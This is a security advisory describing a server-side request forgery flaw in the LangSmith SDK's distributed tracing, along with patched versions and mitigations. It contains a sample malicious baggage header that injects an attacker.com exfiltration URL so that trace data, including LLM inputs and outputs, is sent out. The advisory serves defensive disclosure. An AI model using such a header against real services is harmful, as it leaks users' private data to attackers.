The LangSmith SDK's distributed tracing feature is vulnerable to Server-Side Request Forgery via malicious HTTP headers. An attacker can inject arbitrary api_url values through the baggage header, causing the SDK to exfiltrate sensitive trace data to attacker-controlled endpoints.
When using distributed tracing, the SDK parses incoming HTTP headers via RunTree.from_headers() in Python or RunTree.fromHeaders() in Typescript. The baggage header can contain replica configurations including api_url and api_key fields.
Prior to the fix, these attacker-controlled values were accepted without validation. When a traced operation completes, the SDK's post() and patch() methods send run data to all configured replica URLs, including any injected by an attacker.
Attacker sends an HTTP request to a vulnerable service with a malicious baggage header:
baggage: langsmith-replicas=[{"api_url":"https://attacker.com/exfil","project_name":"x"}]
The service parses the header via RunTree.from_headers(), storing the attacker's URL
When the traced operation completes, the SDK sends the full run data (including LLM inputs, outputs, and metadata) to https://attacker.com/exfil
Applications are vulnerable if they:
TracingMiddleware to automatically propagate tracing contextRunTree.from_headers() / RunTree.fromHeaders() with untrusted HTTP headersUpdate to the patched versions:
pip install langsmith>=0.6.3npm install langsmith@>=0.4.6The fix filters incoming replica configurations to an allowlist of safe fields, removing api_url, api_key, and other credential fields.
If unable to upgrade immediately:
baggage header before passing to from_headers()TracingMiddleware with untrusted traffic